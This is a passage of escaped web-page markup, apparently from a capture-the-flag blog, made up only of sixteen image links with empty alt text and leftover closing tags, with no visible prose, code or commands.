<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-241-1024x419.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-242-1024x553.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-243.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-244-1024x145.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-245.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-246.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-247.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-248.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-249.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-250.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-251-1024x81.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-252-1024x409.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-253-1024x528.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-254.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-255-1024x446.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2026\/03\/image-256-1024x226.png\")
<\/div><\/figure>\n\n\n\n